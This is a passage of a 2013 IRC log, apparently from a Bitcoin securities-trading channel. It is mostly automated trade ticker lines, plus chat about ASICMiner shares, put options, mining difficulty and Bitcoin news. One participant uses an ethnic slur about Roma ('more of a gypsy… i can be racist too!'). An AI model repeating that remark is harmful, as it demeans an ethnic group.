BTC [-] Jul 11 07:50:55 [HAVELOCK] [AM1] 2 @ 4.55 = 9.1 BTC [-] Jul 11 07:52:14 [HAVELOCK] [AM100] 14 @ 0.042499 = 0.595 BTC [+] Jul 11 07:53:18 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [-] Jul 11 07:53:39 [BTCTC] [S.DICE-PT] 400 @ 0.0021 = 0.84 BTC [-] Jul 11 07:56:25 [BTCTC] [ASICMINER-PT] 1 @ 4.390005 BTC [-] Jul 11 07:56:40 [BTCTC] [BASIC-MINING] 10 @ 0.350001 = 3.5 BTC [-] Jul 11 07:57:15 [BTCTC] [BASIC-MINING] 10 @ 0.399999 = 4 BTC [+] Jul 11 07:58:14 [BTCTC] [BITVPS] 1 @ 0.00171 BTC [-] Jul 11 08:00:34 [HAVELOCK] [AM100] 5 @ 0.042499 = 0.2125 BTC [+] Jul 11 08:06:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.043987 = 0.4399 BTC [+] Jul 11 08:06:41 [HAVELOCK] [AM100] 128 @ 0.042499 = 5.4399 BTC [+] Jul 11 08:07:04 [MPEX] [S.MPOE] 8370 @ 0.00080939 = 6.7746 BTC [-] Jul 11 08:07:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.043988 BTC [+] Jul 11 08:08:48 [BTCTC] [LTC-ATF.B2] 2 @ 0.0105 = 0.021 BTC [+] Jul 11 08:10:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.043988 = 0.132 BTC [+] Jul 11 08:14:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0438 BTC [-] Jul 11 08:19:16 [HAVELOCK] [AM100] 44 @ 0.042499 = 1.87 BTC [+] Jul 11 08:23:15 [BTCTC] [ASICMINER-PT] 3 @ 4.390005 = 13.17 BTC [-] Jul 11 08:23:17 [BTCTC] [ASICMINER-PT] 2 @ 4.390005 = 8.78 BTC [-] Jul 11 08:25:30 [HAVELOCK] [AM100] 1 @ 0.0425 BTC [+] Jul 11 08:27:04 [BTCTC] [RSM] 136 @ 0.013103 = 1.782 BTC [-] Jul 11 08:27:10 [BTCTC] [RSM] 10 @ 0.013102 = 0.131 BTC [-] Jul 11 08:27:12 [BTCTC] [RSM] 10 @ 0.013102 = 0.131 BTC [-] Jul 11 08:27:14 [BTCTC] [RSM] 10 @ 0.013101 = 0.131 BTC [-] Jul 11 08:27:16 [BTCTC] [RSM] 10 @ 0.0131 = 0.131 BTC [-] Jul 11 08:27:17 [BTCTC] [RSM] 10 @ 0.013009 = 0.1301 BTC [-] Jul 11 08:27:19 [BTCTC] [RSM] 10 @ 0.013008 = 0.1301 BTC [-] Jul 11 08:27:20 [BTCTC] [RSM] 20 @ 0.013 = 0.26 BTC [-] Jul 11 08:29:44 [BTCTC] [COGNITIVE] 1 @ 0.344999 BTC [-] Jul 11 08:31:38 [BTCTC] [COGNITIVE] 12 @ 0.345 = 4.14 BTC [+] Jul 11 08:32:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.0438 = 0.1314 BTC [-] Jul 11 08:36:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0438 BTC [-] Jul 11 08:37:41 [BTCTC] [BTC-BOND] 5 @ 0.009903 = 0.0495 BTC [-] Jul 11 08:38:34 [BTCTC] [BTC-BOND] 155 @ 0.009902 = 1.5348 BTC [-] Jul 11 08:39:15 [BTCTC] [COGNITIVE] 1 @ 0.344999 BTC [-] Jul 11 08:40:25 [BTCTC] [COGNITIVE] 4 @ 0.345 = 1.38 BTC [+] Jul 11 08:42:22 [BTCTC] [ASICMINER-PT] 1 @ 4.391 BTC [+] Jul 11 08:42:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0438 BTC [-] Jul 11 08:43:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0438 BTC [-] Jul 11 08:43:57 [BTCTC] [DMS.MINING] 1 @ 0.016499 BTC [+] Jul 11 08:45:48 [BTCTC] [BASIC-MINING] 10 @ 0.397999 = 3.98 BTC [-] Jul 11 08:46:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0438 = 0.219 BTC [-] Jul 11 08:47:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0438 BTC [-] Jul 11 08:49:40 [BTCTC] [AMC-PT] 40 @ 0.00249 = 0.0996 BTC [-] Jul 11 08:50:07 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [-] Jul 11 08:50:36 [HAVELOCK] [AM100] 3 @ 0.0432 = 0.1296 BTC [+] Jul 11 08:50:37 [HAVELOCK] [AM100] 1 @ 0.0432899 BTC [+] Jul 11 08:50:38 [HAVELOCK] [AM100] 92 @ 0.04328999 = 3.9827 BTC [+] Jul 11 08:50:39 [HAVELOCK] [AM100] 49 @ 0.04329 = 2.1212 BTC [+] Jul 11 08:53:10 [BTCTC] [RSM] 10 @ 0.012601 = 0.126 BTC [-] Jul 11 08:53:28 [BTCTC] [RSM] 30 @ 0.0126 = 0.378 BTC [-] Jul 11 08:53:44 [BTCTC] [RSM] 10 @ 0.012504 = 0.125 BTC [-] Jul 11 08:54:29 [BTCTC] [TAT.ASICMINER] 21 @ 0.0438 = 0.9198 BTC [-] Jul 11 08:55:00 [BTCTC] [TAT.ASICMINER] 16 @ 0.043988 = 0.7038 BTC [+] Jul 11 08:56:00 [BTCTC] [BFMINES] 9 @ 0.004 = 0.036 BTC [+] Jul 11 08:56:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [+] Jul 11 08:56:25 [BTCTC] [TAT.ASICMINER] 18 @ 0.0441 = 0.7938 BTC [+] Jul 11 08:57:12 [BTCTC] [GSDPT] 3 @ 0.0023 = 0.0069 BTC [+] Jul 11 09:00:05 [BTCTC] [AMC-PT] 25 @ 0.00249 = 0.0623 BTC [-] Jul 11 09:05:46 [BTCTC] [ASICMINER-PT] 1 @ 4.430001 BTC [+] Jul 11 09:05:48 [BTCTC] [ASICMINER-PT] 2 @ 4.43 = 8.86 BTC [-] Jul 11 09:05:49 [BTCTC] [ASICMINER-PT] 1 @ 4.420001 BTC [-] Jul 11 09:05:51 [BTCTC] [ASICMINER-PT] 3 @ 4.42 = 13.26 BTC [-] Jul 11 09:06:23 [BTCTC] [ASICMINER-PT] 2 @ 4.42 = 8.84 BTC [-] Jul 11 09:06:57 [BTCTC] [AMC-PT] 50 @ 0.00249 = 0.1245 BTC [-] Jul 11 09:06:58 [BTCTC] [ASICMINER-PT] 1 @ 4.410001 BTC [-] Jul 11 09:07:01 [BTCTC] [ASICMINER-PT] 2 @ 4.41 = 8.82 BTC [-] Jul 11 09:07:03 [BTCTC] [ASICMINER-PT] 1 @ 4.400001 BTC [-] Jul 11 09:07:05 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 11 09:07:07 [BTCTC] [ASICMINER-PT] 2 @ 4.390005 = 8.78 BTC [-] Jul 11 09:07:09 [BTCTC] [ASICMINER-PT] 8 @ 4.39 = 35.12 BTC [-] Jul 11 09:07:11 [BTCTC] [ASICMINER-PT] 3 @ 4.381001 = 13.143 BTC [-] Jul 11 09:07:11 [BTCTC] [ASICMINER-PT] 1 @ 4.381001 BTC [-] Jul 11 09:07:13 [BTCTC] [ASICMINER-PT] 2 @ 4.3809 = 8.7618 BTC [-] Jul 11 09:07:15 [BTCTC] [ASICMINER-PT] 1 @ 4.380801 BTC [-] Jul 11 09:07:17 [BTCTC] [ASICMINER-PT] 3 @ 4.380002 = 13.14 BTC [-] Jul 11 09:07:19 [BTCTC] [ASICMINER-PT] 14 @ 4.380001 = 61.32 BTC [-] Jul 11 09:07:21 [BTCTC] [ASICMINER-PT] 53 @ 4.38 = 232.14 BTC [-] Jul 11 09:07:23 [BTCTC] [BASIC-MINING] 1 @ 0.397999 BTC [-] Jul 11 09:07:48 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 11 09:07:53 [BTCTC] [ASICMINER-PT] 2 @ 4.38 = 8.76 BTC [-] Jul 11 09:08:55 [BTCTC] [COGNITIVE] 1 @ 0.344999 BTC [-] Jul 11 09:11:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [+] Jul 11 09:13:59 [BTCTC] [PAJKA.BOND] 1 @ 0.055499 BTC [+] Jul 11 09:14:55 [BTCTC] [DMS.SELLING] 11 @ 0.0338 = 0.3718 BTC [+] Jul 11 09:15:04 [BTCTC] [S.DICE-PT] 200 @ 0.002299 = 0.4598 BTC [+] Jul 11 09:16:25 [BTCTC] [DMS.MINING] 1 @ 0.016499 BTC [+] Jul 11 09:18:49 [BTCTC] [ASICMINER-PT] 1 @ 4.410001 BTC [+] Jul 11 09:18:51 [BTCTC] [ASICMINER-PT] 2 @ 4.41 = 8.82 BTC [-] Jul 11 09:18:52 [BTCTC] [DMS.MINING] 1 @ 0.01602 BTC [-] Jul 11 09:19:09 [BTCTC] [DMS.MINING] 1 @ 0.016001 BTC [-] Jul 11 09:19:23 [BTCTC] [B.YABMC] 1 @ 0.004599 BTC [-] Jul 11 09:19:39 [BTCTC] [DMS.SELLING] 1 @ 0.0338 BTC [+] Jul 11 09:20:14 [BTCTC] [B.YABMC] 1 @ 0.0046 BTC [+] Jul 11 09:21:21 [BTCTC] [S.DICE-PT] 1 @ 0.0023 BTC [+] Jul 11 09:22:23 [BTCTC] [S.DICE-PT] 199 @ 0.0023 = 0.4577 BTC [+] Jul 11 09:22:24 [BTCTC] [S.DICE-PT] 200 @ 0.002299 = 0.4598 BTC [-] Jul 11 09:24:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.0441 = 0.1764 BTC [+] Jul 11 09:25:15 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 11 09:28:58 [BTCTC] [ASICMINER-PT] 5 @ 4.399999 = 22 BTC [-] Jul 11 09:32:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.0441 = 0.1323 BTC [+] Jul 11 09:32:29 [BTCTC] [DMS.MINING] 6 @ 0.016499 = 0.099 BTC [+] Jul 11 09:33:02 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [-] Jul 11 09:35:28 [MPEX] [S.MPOE] 2230 @ 0.00081188 = 1.8105 BTC [+] Jul 11 09:35:30 [MPEX] [S.MPOE] 8790 @ 0.00081183 = 7.136 BTC [-] Jul 11 09:36:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.043501 = 0.348 BTC [-] **** BEGIN LOGGING AT Thu Jul 11 17:26:07 2013 Jul 11 17:30:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [-] Jul 11 17:37:11 [BTCTC] [DMS.SELLING] 80 @ 0.033996 = 2.7197 BTC [+] Jul 11 17:38:09 [BTCTC] [AMC-PT] 263 @ 0.002499 = 0.6572 BTC [-] Jul 11 17:39:54 [BTCTC] [DMS.PURCHASE] 100 @ 0.048832 = 4.8832 BTC [-] Jul 11 17:40:30 [BTCTC] [TAT.ASICMINER] 15 @ 0.043787 = 0.6568 BTC [+] Jul 11 17:41:25 [BTCTC] [COGNITIVE] 2 @ 0.33 = 0.66 BTC [-] Jul 11 17:42:45 [BTCTC] [COGNITIVE] 8 @ 0.34059 = 2.7247 BTC [+] Jul 11 17:43:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0434 BTC [-] Jul 11 17:43:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.0434 = 0.0868 BTC [-] Jul 11 17:44:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.043 = 1.075 BTC [-] Jul 11 17:45:09 [BTCTC] [BASIC-MINING] 3 @ 0.389999 = 1.17 BTC [+] Jul 11 17:46:23 [BTCTC] [TAT.ASICMINER] 18 @ 0.043 = 0.774 BTC [-] Jul 11 17:46:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [-] Jul 11 17:49:42 [BTCTC] [DMS.SELLING] 46 @ 0.033998 = 1.5639 BTC [+] Jul 11 18:00:20 [BTCTC] [DMS.MINING] 6 @ 0.0163 = 0.0978 BTC [-] Jul 11 18:00:22 [BTCTC] [DMS.MINING] 10 @ 0.01611 = 0.1611 BTC [-] Jul 11 18:00:24 [BTCTC] [DMS.MINING] 20 @ 0.0161 = 0.322 BTC [-] Jul 11 18:00:26 [BTCTC] [DMS.MINING] 10 @ 0.0161 = 0.161 BTC [-] Jul 11 18:00:28 [BTCTC] [DMS.MINING] 14 @ 0.016001 = 0.224 BTC [-] Jul 11 18:00:31 [BTCTC] [DMS.MINING] 1 @ 0.016001 BTC [-] Jul 11 18:00:33 [BTCTC] [DMS.MINING] 6 @ 0.016001 = 0.096 BTC [-] Jul 11 18:00:35 [BTCTC] [DMS.MINING] 22 @ 0.016001 = 0.352 BTC [-] Jul 11 18:00:37 [BTCTC] [DMS.MINING] 10 @ 0.016001 = 0.16 BTC [-] Jul 11 18:00:39 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 11 18:01:15 [BTCTC] [DMS.PURCHASE] 110 @ 0.048832 = 5.3715 BTC [-] Jul 11 18:04:12 asciilifeform http://trilema.com/2013/the-wonder-of-inflation/#comment-93905 << this guy you'll like Jul 11 18:04:39 [BTCTC] [DMS.MINING] 25 @ 0.01601 = 0.4003 BTC [+] Jul 11 18:04:52 [BTCTC] [DMS.MINING] 40 @ 0.016 = 0.64 BTC [-] Jul 11 18:04:53 [BTCTC] [DMS.MINING] 4 @ 0.016 = 0.064 BTC [-] Jul 11 18:04:54 [BTCTC] [DMS.MINING] 4 @ 0.016 = 0.064 BTC [-] Jul 11 18:04:56 [BTCTC] [DMS.MINING] 4 @ 0.016 = 0.064 BTC [-] Jul 11 18:04:57 [BTCTC] [DMS.MINING] 10 @ 0.016 = 0.16 BTC [-] Jul 11 18:07:00 "whenever a poorly administered country has many problems, inflation is one of them" yep Jul 11 18:09:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.04259 BTC [-] Jul 11 18:11:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.042501 BTC [-] Jul 11 18:11:53 [BTCTC] [TAT.ASICMINER] 8 @ 0.04259 = 0.3407 BTC [+] Jul 11 18:14:02 [BTCTC] [DMS.SELLING] 49 @ 0.035189 = 1.7243 BTC [+] Jul 11 18:14:29 http://www.telegraph.co.uk/news/worldnews/europe/russia/10173645/Kremlin-returns-to-typewriters-to-avoid-computer-leaks.html Jul 11 18:14:32 Kremlin returns to typewriters to avoid computer leaks - Telegraph Jul 11 18:14:43 pankkake kinda unavoidable, since inflation is pretty much country score. Jul 11 18:24:08 ;;estimate Jul 11 18:24:34 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0045 = 0.018 BTC [+] Jul 11 18:25:16 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0045 = 0.009 BTC [+] Jul 11 18:25:50 [BTCTC] [ASICMINER-PT] 1 @ 4.36 BTC [+] Jul 11 18:26:14 [HAVELOCK] [AM100] 25 @ 0.041113 = 1.0278 BTC [-] Jul 11 18:26:30 [BTCTC] [ASICMINER-PT] 1 @ 4.385 BTC [+] Jul 11 18:26:40 [BTCTC] [TAT.ASICMINER] 88 @ 0.04259 = 3.7479 BTC [+] Jul 11 18:26:50 [BTCTC] [COGNITIVE] 2 @ 0.34059 = 0.6812 BTC [+] Jul 11 18:28:43 [BTCTC] [DMS.MINING] 49 @ 0.01525 = 0.7473 BTC [-] Jul 11 18:28:56 [HAVELOCK] [AM100] 10 @ 0.041501 = 0.415 BTC [+] Jul 11 18:29:58 [BTCTC] [DMS.PURCHASE] 50 @ 0.048832 = 2.4416 BTC [-] Jul 11 18:30:15 no estiumate for you. Jul 11 18:30:21 come back, 1000 blocks. Jul 11 18:30:59 [BTCTC] [RSM] 1 @ 0.01255 BTC [-] Jul 11 18:31:01 [BTCTC] [RSM] 5 @ 0.01255 = 0.0628 BTC [-] Jul 11 18:31:32 [BTCTC] [COGNITIVE] 1 @ 0.34059 BTC [+] Jul 11 18:33:07 :( Jul 11 18:35:01 [HAVELOCK] [AM100] 22 @ 0.042918 = 0.9442 BTC [+] Jul 11 18:37:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.042999 BTC [+] Jul 11 18:37:32 [BTCTC] [TAT.ASICMINER] 164 @ 0.043 = 7.052 BTC [+] Jul 11 18:37:53 [BTCTC] [DMS.MINING] 13 @ 0.01525 = 0.1983 BTC [-] Jul 11 18:37:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 11 18:38:22 [BTCTC] [TAT.ASICMINER] 8 @ 0.0432 = 0.3456 BTC [+] Jul 11 18:41:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.042601 = 0.2556 BTC [-] Jul 11 18:42:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [+] Jul 11 18:42:17 [BTCTC] [TAT.ASICMINER] 25 @ 0.043 = 1.075 BTC [+] Jul 11 18:44:30 [BTCTC] [ASICMINER-PT] 1 @ 4.349999 BTC [-] Jul 11 18:44:32 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 11 18:45:25 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 11 18:47:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.042651 = 0.2133 BTC [-] Jul 11 18:47:21 [BTCTC] [TAT.ASICMINER] 10 @ 0.04265 = 0.4265 BTC [-] Jul 11 18:47:45 .d Jul 11 18:47:45 26162875.68257 | Next Diff in 1904 blocks | Estimated Change: 21.0811% in 10d 10h 26m 19s Jul 11 18:48:21 [BTCTC] [TAT.ASICMINER] 11 @ 0.0426 = 0.4686 BTC [-] Jul 11 18:48:58 [BTCTC] [ASICMINER-PT] 3 @ 4.389997 = 13.17 BTC [+] Jul 11 18:49:59 Juicy Diff Jul 11 18:57:16 ;;bcstats Jul 11 18:57:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.042998 = 2.1499 BTC [+] Jul 11 18:58:05 bitcoin charts reports Estimated 26462797 in 1923 blks Jul 11 18:58:27 .d Jul 11 18:58:27 26162875.68257 | Next Diff in 1900 blocks | Estimated Change: 24.0686% in 10d 0h 26m 23s Jul 11 18:58:35 1.1% Jul 11 18:59:09 watching your AMC devalue? Jul 11 18:59:16 nah Jul 11 18:59:21 going up Jul 11 18:59:33 [BTCTC] [COGNITIVE] 1 @ 0.34059 BTC [+] Jul 11 18:59:48 i mean the actual miners Jul 11 18:59:51 and chips Jul 11 19:00:11 I need to borrow myself some ASICMINER... Jul 11 19:00:34 [BTCTC] [DMS.MINING] 5 @ 0.016482 = 0.0824 BTC [+] Jul 11 19:00:36 [BTCTC] [DMS.MINING] 8 @ 0.016999 = 0.136 BTC [+] Jul 11 19:00:39 ah those yes Jul 11 19:00:44 same as everybody :P Jul 11 19:00:54 [BTCTC] [TAT.ASICMINER] 11 @ 0.043 = 0.473 BTC [+] Jul 11 19:01:00 To short them... Jul 11 19:01:20 If I wanted some, I'd just buy them Jul 11 19:01:28 [BTCTC] [BASIC-MINING] 1 @ 0.379999 BTC [-] Jul 11 19:01:33 what's your offer Nam Jul 11 19:01:41 maybe i'll write some puts for ya Jul 11 19:02:38 [BTCTC] [BASIC-MINING] 1 @ 0.379999 BTC [-] Jul 11 19:04:26 I'd say at 4 BTC a piece. Maybe .10 per put for a few months. Jul 11 19:05:23 [BTCTC] [DMS.MINING] 10 @ 0.016599 = 0.166 BTC [-] Jul 11 19:05:44 [BTCTC] [DMS.MINING] 10 @ 0.016599 = 0.166 BTC [-] Jul 11 19:06:12 [BTCTC] [DMS.MINING] 10 @ 0.0166 = 0.166 BTC [+] Jul 11 19:06:14 you call that shorting? Jul 11 19:06:35 it's only like 4.3 now Jul 11 19:06:38 [BTCTC] [DMS.MINING] 28 @ 0.0168 = 0.4704 BTC [+] Jul 11 19:06:46 and you wanna buy for 4 in a few mos? Jul 11 19:06:58 [BTCTC] [BITVPS] 175 @ 0.001897 = 0.332 BTC [+] Jul 11 19:07:08 A put... a put is an option to sell. I want the option to sell at 4 in the next months Jul 11 19:07:11 [BTCTC] [DMS.MINING] 83 @ 0.017 = 1.411 BTC [+] Jul 11 19:07:13 [BTCTC] [DMS.MINING] 370 @ 0.017 = 6.29 BTC [+] Jul 11 19:07:15 if he buys a put he wants to sell at 4 bro :D Jul 11 19:07:18 sry Jul 11 19:07:36 got mixed up Jul 11 19:07:46 Haha, Options always so confusing :D. Jul 11 19:07:59 then your premium sucks Jul 11 19:09:09 [BTCTC] [COGNITIVE] 2 @ 0.34059 = 0.6812 BTC [+] Jul 11 19:09:43 I know, the problem is it requires 4 BTC collateral per PUT for the issuer. Jul 11 19:10:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.043 = 0.129 BTC [+] Jul 11 19:10:27 If I could just borrow the shares on contract, would be better. Such that the person can keep dividends + premium Jul 11 19:10:34 are puts / calls like regular stock puts calls meaning that 1 call = 100 shares? Jul 11 19:10:41 generally I think everyone is too quick to overestimate the competition still Jul 11 19:10:59 [BTCTC] [DMS.SELLING] 40 @ 0.035189 = 1.4076 BTC [+] Jul 11 19:11:11 we have a year's worth of no one shipping like they planned Jul 11 19:11:23 ThickAsThieves: Yes just look at BFL xD. Jul 11 19:11:24 and somehow people think the next 3mos will be everyone shipping as planned Jul 11 19:11:36 Still haven't shipped my order, almost a year old now. Jul 11 19:12:49 i do think we're getting close to finding the top for AM shareprice Jul 11 19:13:12 but if people don't ship in any notable capacity for 3mos Jul 11 19:13:18 AM could keep going up Jul 11 19:13:41 [BTCTC] [ASICMINER-PT] 1 @ 4.385 BTC [-] Jul 11 19:14:01 I'm taking a bet otherwise... what's wrong in that? Jul 11 19:14:40 [BTCTC] [BASIC-MINING] 8 @ 0.379999 = 3.04 BTC [-] Jul 11 19:14:42 [BTCTC] [BASIC-MINING] 1 @ 0.38 BTC [+] Jul 11 19:14:43 [BTCTC] [BASIC-MINING] 1 @ 0.39 BTC [+] Jul 11 19:15:01 well i just said what i think is wrong about it ;) Jul 11 19:15:11 only time will tell Jul 11 19:15:59 http://bitcoinmagazine.com/bitcoin-de-announces-partnership-with-european-bank/ Jul 11 19:16:03 Still even if people finally ship some asics, what's AM to stop deploying more GH's? Jul 11 19:16:05 Bitcoin.de Announces Partnership with European Bank | Bitcoin MagazineBitcoin Magazine Jul 11 19:16:33 i wonder at what point miners wise up Jul 11 19:16:43 and demand for units declines Jul 11 19:16:51 i guess it wont matter Jul 11 19:16:59 manufacturers will just start mining themselves Jul 11 19:17:15 [BTCTC] [DMS.MINING] 1 @ 0.0173 BTC [+] Jul 11 19:17:27 [BTCTC] [S.DICE-PT] 10 @ 0.0023 = 0.023 BTC [+] Jul 11 19:17:28 [HAVELOCK] [AM100] 38 @ 0.0418 = 1.5884 BTC [-] Jul 11 19:17:29 [HAVELOCK] [AM100] 2 @ 0.04151 = 0.083 BTC [-] Jul 11 19:17:31 [HAVELOCK] [AM100] 53 @ 0.0415 = 2.1995 BTC [-] Jul 11 19:17:32 [HAVELOCK] [AM100] 16 @ 0.0411125 = 0.6578 BTC [-] Jul 11 19:17:33 [HAVELOCK] [AM100] 50 @ 0.041111 = 2.0556 BTC [-] Jul 11 19:17:34 [HAVELOCK] [AM100] 2 @ 0.041009 = 0.082 BTC [-] Jul 11 19:17:35 [HAVELOCK] [AM100] 148 @ 0.0408 = 6.0384 BTC [-] Jul 11 19:17:35 [HAVELOCK] [AM100] 6 @ 0.04077701 = 0.2447 BTC [-] Jul 11 19:17:47 Anyone with a legal residency in the European Union, Iceland, Liechtenstein, Norway and Switzerland will be able to get one of these accounts Jul 11 19:17:50 wow, nice Jul 11 19:17:59 are all AM1's available now your's ThickAsThieves? Jul 11 19:18:23 Yes Jul 11 19:18:36 no outside imports have been completed Jul 11 19:18:56 [HAVELOCK] [AM1] 2 @ 4.55 = 9.1 BTC [+] Jul 11 19:19:30 Looks like germany is embracing BTC. Jul 11 19:19:51 Wasn't there a village/town that swapped entirely to using BTC? Jul 11 19:19:59 dunno Jul 11 19:20:12 strange, cause they were the first to make ukash prepaid cards and simmilar for domestic use only while others did not Jul 11 19:20:17 some suggestions that peoiple wanna get Iceland to do it Jul 11 19:20:32 http://thegenesisblock.com/latest-shipment-of-avalon-asics-could-increase-network-hashrate-by-500/ Jul 11 19:20:34 Latest Shipment of Avalon ASICs Could Increase Network Hashrate By 500% - The Genesis Block Jul 11 19:21:31 http://www.coindesk.com/us-law-firm-nesenoff-miltenberg-accepts-payment-in-bitcoin/ Jul 11 19:21:34 US law firm Nesenoff & Miltenberg accepts payment in bitcoin Jul 11 19:21:43 [HAVELOCK] [AM100] 40 @ 0.040782 = 1.6313 BTC [+] Jul 11 19:21:46 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 11 19:21:52 [HAVELOCK] [AM100] 14 @ 0.040782 = 0.5709 BTC [+] Jul 11 19:22:12 http://www.youtube.com/watch?v=HhM4cqg3vxc Jul 11 19:22:17 Bitcoin drive gains currency in Germany - YouTube Jul 11 19:22:51 [HAVELOCK] [AM100] 146 @ 0.040781 = 5.954 BTC [-] Jul 11 19:23:06 In Kreuzberg, Berlin, virtual currency Bitcoin has expanded off the internet to become a favoured medium of exchange in real shops and bars. Joerg Platzer, the owner of bar Room 77 is helping to establish what he believes to be the world's first Bitcoin local economy. Jul 11 19:24:26 Neat! Jul 11 19:24:33 [BTCTC] [DMS.MINING] 2 @ 0.0173 = 0.0346 BTC [+] Jul 11 19:24:57 When does Friedcat regulary do share transfers only Wednesday? Jul 11 19:25:07 [BTCTC] [DMS.MINING] 10 @ 0.0165 = 0.165 BTC [-] Jul 11 19:25:09 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 11 19:25:10 [BTCTC] [DMS.MINING] 28 @ 0.0156 = 0.4368 BTC [-] Jul 11 19:25:12 [BTCTC] [DMS.MINING] 1 @ 0.015502 BTC [-] Jul 11 19:25:57 He seems to do them 2-3 times per week Jul 11 19:26:04 hard to say when Jul 11 19:26:12 he might batch them Jul 11 19:26:14 [BTCTC] [DMS.PURCHASE] 110 @ 0.048759 = 5.3635 BTC [-] Jul 11 19:26:15 [BTCTC] [DMS.MINING] 2 @ 0.0173 = 0.0346 BTC [+] Jul 11 19:26:27 and since there has been less OTC action, he might be doing them less often Jul 11 19:26:29 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jul 11 19:26:34 ok nice :). Jul 11 19:27:28 I really like Havelock, 0% fee on buys. Jul 11 19:27:37 and 0.4 on sells is pretty low Jul 11 19:27:40 BitFunder is that way too Jul 11 19:27:48 and demand for units declines << never, basically. Jul 11 19:27:51 but you need to do a LOT of trading to get your fees down Jul 11 19:27:58 [BTCTC] [ASICMINER-PT] 1 @ 4.389997 BTC [+] Jul 11 19:28:12 [BTCTC] [BASIC-MINING] 8 @ 0.394 = 3.152 BTC [+] Jul 11 19:28:39 ;;ticker Jul 11 19:28:45 ahem. mpex is still .2 Jul 11 19:28:47 gribble iz down Jul 11 19:28:57 [BTCTC] [S.DICE-PT] 57 @ 0.0023 = 0.1311 BTC [+] Jul 11 19:29:07 oh wow the price i going up cray cray Jul 11 19:29:28 ;;smickles Jul 11 19:29:31 ;;seen smickles Jul 11 19:29:32 what, not the end of the world anymore ? Jul 11 19:29:39 oops forgot gribble is down Jul 11 19:29:47 do I Look like I care if the price goes up or down? Jul 11 19:29:51 smickles gots all my coins Jul 11 19:29:55 lol Jul 11 19:30:04 $avg Jul 11 19:30:05 mircea_popescu: 83.77 Jul 11 19:30:59 smickle got all your coins? Jul 11 19:33:21 yea. he was my trustee from October until now cause I liked his work on mpex trades Jul 11 19:33:25 Made a good deal from options Jul 11 19:33:28 until he vanished Jul 11 19:33:49 but he's cool. I think some shit went down with him, but I'll get the coins back eventually. Jul 11 19:33:56 if he's got all your coins you're just hanging by a string then? Jul 11 19:34:05 what, still ?! Jul 11 19:34:12 yup mr. popescu Jul 11 19:34:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.043 = 0.387 BTC [+] Jul 11 19:34:33 it seems your protege is more of a gypsy than you (i can be racist too!) Jul 11 19:36:50 [BTCTC] [DMS.MINING] 20 @ 0.015503 = 0.3101 BTC [-] Jul 11 19:37:14 [BTCTC] [ASICMINER-PT] 1 @ 4.3001 BTC [-] Jul 11 19:37:16 [BTCTC] [ASICMINER-PT] 5 @ 4.3 = 21.5 BTC [-] Jul 11 19:37:19 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 11 19:37:27 [BTCTC] [DMS.MINING] 9 @ 0.015502 = 0.1395 BTC [-] Jul 11 19:37:48 [BTCTC] [BASIC-MINING] 3 @ 0.397999 = 1.194 BTC [+] Jul 11 19:37:48 !ticker m ^oix Jul 11 19:37:49 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.98960064 / 79.19726872 / 108.15636223 (6 shares, 2.13 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 11 19:38:08 [BTCTC] [DMS.MINING] 20 @ 0.0155 = 0.31 BTC [-] Jul 11 19:38:08 why is no one going balls deep on options anymore Jul 11 19:38:13 where is Bugpowda Jul 11 19:38:16 [BTCTC] [BASIC-MINING] 1 @ 0.398 BTC [+] Jul 11 19:38:30 [BTCTC] [BASIC-MINING] 1 @ 0.3999 BTC [+] Jul 11 19:38:44 [BTCTC] [BASIC-MINING] 5 @ 0.399999 = 2 BTC [+] Jul 11 19:39:22 [BTCTC] [BASIC-MINING] 4 @ 0.4 = 1.6 BTC [+] Jul 11 19:39:23 [BTCTC] [DMS.MINING] 1 @ 0.01511 BTC [-] Jul 11 19:39:24 [BTCTC] [DMS.MINING] 20 @ 0.01511 = 0.3022 BTC [-] Jul 11 